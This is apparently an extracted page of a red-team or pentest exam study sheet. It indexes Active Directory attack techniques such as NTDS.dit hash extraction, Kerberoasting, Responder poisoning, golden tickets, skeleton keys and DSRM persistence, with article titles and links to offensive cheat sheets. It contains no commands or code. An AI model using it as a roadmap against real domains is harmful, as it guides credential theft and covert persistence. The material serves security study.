HONEYTOKENS EVASION
Credential Dumping
NTDS.DIT PASSWORD EXTRACTION
• How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
• Extracting Password Hashes From The Ntds.dit File SAM
(SECURITY ACCOUNTS MANAGER)
KERBEROASTING
• Roasting AS-REPs
C lick ME
Exam Info
• Pwning with Responder – A Pentester’s Guide
• LLMNR/NBT-NS Poisoning Using Responder
OTHER
Persistence
GOLDEN TICKET
• Golden Ticket
• Kerberos Golden Tickets are Now More Golden SID
HISTORY
SILVER TICKET
SKELETON KEYS
• Unlocking All The Doors To Active Directory With The Skeleton Key Attack
• Skeleton Key
• Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers
&BackDoor Your Active Directory Forest
SEENABLEDELEGATIONPRIVILEGE
• The Most Dangerous User Right You (Probably) Have Never Heard Of
C lick ME
Exam Info
SECURITY SUPPORT PROVIDER
• Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)
DIRECTORY SERVICES RESTORE MODE
• Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)
• Shadow Admins – The Stealthy Accounts That You Should Fear The Most
• The Unintended Risks of Trusting Active Directory
Tools & Scripts
• Mimikatz - Utility to extract plaintexts passwords, hash, PIN code and kerberos tickets
from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets
C lick ME
Exam Info
https://0x1.gitlab.io/pentesting/Active-Directory-Kill-Chain-Attack-and-Defense/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20
Resources/Active%20Directory%20Attack.md
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/CyberSecurityUP/Red-Team-
Management/tree/main/Adversary%20Emulation
C lick ME
C lick ME